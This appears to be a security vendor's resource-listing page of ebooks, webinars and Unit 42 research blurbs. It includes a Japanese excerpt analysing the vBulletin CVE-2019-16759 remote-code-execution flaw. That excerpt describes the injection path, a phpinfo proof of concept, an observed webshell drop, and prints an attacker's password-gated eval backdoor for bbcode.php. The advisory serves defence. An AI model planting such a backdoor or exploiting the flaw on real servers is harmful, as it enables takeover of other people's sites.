Date

Education and Professional Services

Displaying 31 to 60 of 4372

Security or Flexibility: The Dilemma of the Telco Cloud

This ebrief explains why traditional security solutions often come up short when it comes to securing the telco cloud, what new solutions are arriving on the market, and areas where more innovation is needed.
  • 1
  • 284

The Geek Guide to Calculating the ROI of DevSecOps

This Geek Guide examines the business value of adopting DevSecOps and the container technologies and provides advice that will help you achieve DevSecOps.
  • 1

vBulletin における入力確認に関する脆弱性(CVE-2019-16759)のエクスプロイト状況

概要 2019年9月24日(米国時間)にvBulletinの新しいゼロデイ脆弱性が公開されました。vBulletinはプロプライエタリなインターネットフォーラムソフトウェアで、当該脆弱性に割り当てられたCVE番号はCVE-2019-16759です。公開から数週間が経過し、Unit 42のリサーチャーは、同脆弱性が積極的に悪用されている状況を確認しています。実行中のvBulletinサーバーのバージョンが5.0.0から5.5.4である場合、同脆弱性の悪用により認証を受けていない攻撃者が特権アクセスや制御を取得し、vBulletinサーバーの正当な所有者が自サイトにアクセスできなくなる可能性があります。10万件以上のサイトが、主要な企業や組織のフォーラムを含めてvBulletin上に構築されていますので、該当組織はただちに修正プログラムを適用する必要があります。 本稿では、脆弱性の根本要因に関する新しい詳細、脆弱性を実証する概念実証コード(PoC)、弊社で実際に観測した攻撃関連情報を共有します。 脆弱性の根本要因分析 本脆弱性はCVSS v3.1ベースでスコア9.8(緊急)と評価された認証前のリモートコード実行における脆弱性で、vBulletinバージョン5.0.0で導入されたAjaxのレンダリング機能によるPHPサーバーサイド テンプレート インジェクションにその原因があります。 エントリ ポイントとなるコードはindex.phpにあります。 このコードは、vB5_Frontend_ApplicationLight::isQuickRoute()を呼び出して、リクエストが「クイックルート」であるかどうかを確認しています。メソッドisQuickRoute()はincludes/vb5/frontend/applicationlight.php内にあります。 図2に示したように、この関数では、リクエストの先頭に”ajax/api”か”ajax/render“があれば真を返します。その後vB5_Frontend_ApplicationLightオブジェクトが初期化され、実行されます(図1参照)。 図3は、リクエストが”ajax/render“で始まる場合、ハンドラが”callRender“に設定されることを示しています。 図4は、callRender()関数が、$routeInfo[2]とarray_merge($_POST, $GET) からの$paramsを利用してテンプレートをレンダリングする様子を示しています。 図5は、vbulletin-style.xmlファイル内に“widget_php”というテンプレートがあることを示しています。このテンプレートによれば、$widgetConfig[‘code’]が空でなく、かつ$vboptions[‘disable_php_rendering’]が設定されていなければ、次のコードが実行されることになっています。 {vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}} {vb:raw $evaledPHP} 図6はevalCode()関数を示していますが、ここで$code内のテキストはPHPのeval()関数によって直接実行されています。   PoC 以上の分析にもとづいて、脆弱性が機能することを証明するエクスプロイトコードを組み立てることができます。パラメーター”routestring“は$_REQUESTからきているので、HTTPメソッド$_GET、$_POST、$_COOKIEのいずれかを介して送信することができます。また、”widgetConfig[code]“は$_GETと$_POSTを介して送信できます。そのため、ここでは単純なPoCとして次のコードを組み、GETリクエストかPOSTリクエストかで送信することにします。       図7は、GETリクエストを介してPoCコードが送信され、phpinfo()が実行された様子を示しています。 図8は、POSTリクエストを介してPoCコードが送信され、phpinfo()が実行された様子を示しています。 インターネット上で観測されたエクスプロイト 弊社の次世代ファイアウォール製品を使い、私たちは当該脆弱性を悪用する試みを複数検出しました。以下、そのなかから3件のエクスプロイトについてまとめます。 最初の例(図9)では、攻撃者がdie(@md5(HellovBulletin))を実行することで、対象サーバーが脆弱かどうかを判断しようとしています。ここでは、リクエストに余計な“=”記号が1つ含まれていたことが原因でエクスプロイトは失敗しています。 また図10は、攻撃者がwebのルートディレクトリに”webconfig.txt.php”を設置しようとした様子を示しています。 図11は”webconfig.txt.php”の内容をBase64デコードしたものを示しています。内容は1行のPHPwebshellです。攻撃者はこのwebshellを使い、スクリプトに任意のコマンドを送信してホストに実行させられるようにしています。 図12は、攻撃者がファイルbbcode.phpを上書きしようとする3番目の例を示しています。 これが成功すればevalCode()は次のコードに置き換えられます。 function evalCode($code) { ob_start();if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code);} $output =...
Qi DengZhibin ZhangHui Gao,
  • 0

Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759

A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites. More than 100,000 sites are built on vBulletin, including the forums of major enterprises and organizations, so it’s imperative to patch immediately.
Qi DengZhibin ZhangHui Gao,
  • 0

Guide: Container Security for Dummies

In this eBook you will learn how to begin addressing container security holistically, how to start embedding security across the entire container life cycle (i.e. DevSecOps), and how to gain full stack security awareness that will allow you to reduce, prioritize and automatically filter out alerts based on holistic, cloud context.
  • 1

When Proxies Aren’t Enough: Three Pillars of Security in Office 365 Deployments

This eBook will help you navigate the requirements for properly deploying Office 365, and provide guidance on how to choose a solution that delivers both the connectivity and security that you need.
  • 0

The Zero Trust Playing Cards

John Kindervag, founder of Zero Trust, uses a simple deck of cards to provide a high level overview Zero Trust.
  • 1
  • 165

Securing Branch Offices with Prisma

Learn how Prisma can help secure your branch offices through cloud-delivered security in this short video.
  • 1

Cloud Control for Major Threats

This infographic looks at how a Zero Trust approach can help mitigate the risks associated with cloud applications and reduce your attack surface.
  • 1

Are you Ready for SaaS Applications?

This infographic details the advantages and disadvantages SaaS applications, industry trends and statistics, and provides best practices to securing cloud applications and data.
  • 0

What is BeyondCorp?

BeyondCorp is a cybersecurity architecture developed at Google which shifts access control from the traditional network perimeter to individual devices and users.
  • 0

What Is Zero Trust for the Cloud?

Zero Trust is an IT security model that eliminates the notion of trust to protect networks, applications and data. While this may seem straightforward to implement in an enterprise network, how do they apply to securing the cloud?
  • 0
  • 54

PKPLUG: 東南アジアを狙い続ける中国の攻撃グループの追跡

パロアルトネットワークスの脅威インテリジェンスチームUnit 42は、東南アジアにおいて、公開済みのマルウェアとカスタムマルウェアを組み合わせた一連のサイバースパイ攻撃キャンペーンを3年間追跡してきました。Unit 42は、これらの攻撃およびこのレポートで後述するその他の攻撃の背後に存在する脅威攻撃者グループ(または複数のグループ)に「PKPLUG」という名前を付けました。現時点では、同じツールを使用し、同じタスクを実行してこの攻撃を行っているのが1つのグループなのか、複数のグループなのかを自信を持って判断できないため、弊社は、グループまたは複数のグループと言及しています。PKPLUGという名前は、PlugXマルウェアをDLLサイドローディングパッケージの一部としてZIPアーカイブファイル内に配信している攻撃手法と、ZIPファイル形式のヘッダーにASCIIマジックバイト「PK」が含まれていることが由来です。
Alex Hinchliffe,
  • 0

Palo Alto Networks & Teridion Integration Guide

For technical details and to configure the integration between our two products, download this integration guide.
  • 0

Malware vs. Exploits

Often used in tandem, Malware and Exploits are sometimes confused for each other. They are, however, not synonymous and bear several clear distinctions.
  • 1

Expedition's Tools Promotional Video

Expedition's Tools Digital Learning Training
  • 0

Palo Alto Networks Achieves New FedRAMP Milestone for Cortex Offerings

Palo Alto Networks (NYSE: PANW), the global cybersecurity leader, today announced Cortex XDR and Cortex Data Lake have achieved the designation of "In Process" for the Federal Risk and...
Santa Clara, CA
  • 0
  • 178

Implementing Zero Trust Using the Five-Step Methodology

There is a five-step model for implementing and maintaining Zero Trust. Using this model, you are able to understand where you are currently in your implementation process and where to go next.
  • 0
  • 137

What is a Zero Trust Architecture?

Like “machine learning” and “AI,” Zero Trust has become one of cybersecurity’s latest buzzwords. With all the noise out in the market, it’s imperative to understand what Zero Trust is, as well as what Zero Trust isn’t.
  • 14
  • 68643

State-sponsored Chinese hackers have been targeting Southeast Asia since 2013

Researchers have revealed a previously undocumented threat actor of Chinese origin that has run at least six different cyber espionage campaigns in the Southeast Asian region since 2013.
  • 0
  • 106

Exceed CIPA Compliance with Palo Alto Networks

A concise summary of how Palo Alto Networks helps K-12 schools achieve CIPA compliance
  • 2
  • 1557

Threat Hunting 101

Join our live webinar to learn the latest techniques for more efficient threat hunting and accelerated investigations.
  • 0

SSL Decryption Deep Dive Webinar 3 Oct

Recent technology trends have led to a marked increase in the amount of TLS traffic, as it provides confidentiality and trust. However, this also presents an opportunity for attackers to hide malicious activity and calls for an even more pressing need for SSL Decryption.
  • 2

Top Five Threats to K-12 Online Student Safety, Data and CIPA Compliance

Read this for tips on protecting your school district from the top threats to online student safety, data privacy and compliance
  • 0

Palo Alto Networks & Corsa Security Solution Brief

To learn more about the key benefits of implementing this integration and sample use cases, download the solution brief.
  • 0

Palo Alto Networks & Corsa Security Integration Guide

For technical details and to configure the integration between our two products, download this integration guide.
  • 0

Firewall Migration Services

Read about our Firewall Migration Services to help you safely migrate to your new Next-generation firewall and Panorama
  • 0

Why You Need Cloud Security

Cloud security requires a strategic approach to be applied across your entire organization. By taking ownership of cloud security and partnering with the right cloud vendor, you can ensure that your organization is fully protected.
  • 1

Chinese cyberespionage group PKPLUG uses custom and off-the-shelf tools

A previously unknown group or collective associated with China is targeting victims in Asia, possibly for geopolitical gain.
  • 0
  • 94

PKPLUG: Chinese Cyber Espionage Group Attacking Asia

For three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of publicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or groups, behind these and other documented attacks referenced later in this report. We say group or groups as our current visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than one group which uses the same tools and has the same tasking. The name comes from the tactic of delivering PlugX malware inside ZIP archive files as part of a DLL side-loading package. The ZIP file format contains the ASCII magic-bytes “PK” in its header, hence PKPLUG.
Alex Hinchliffe,
  • 0
Displaying 31 to 60 of 4372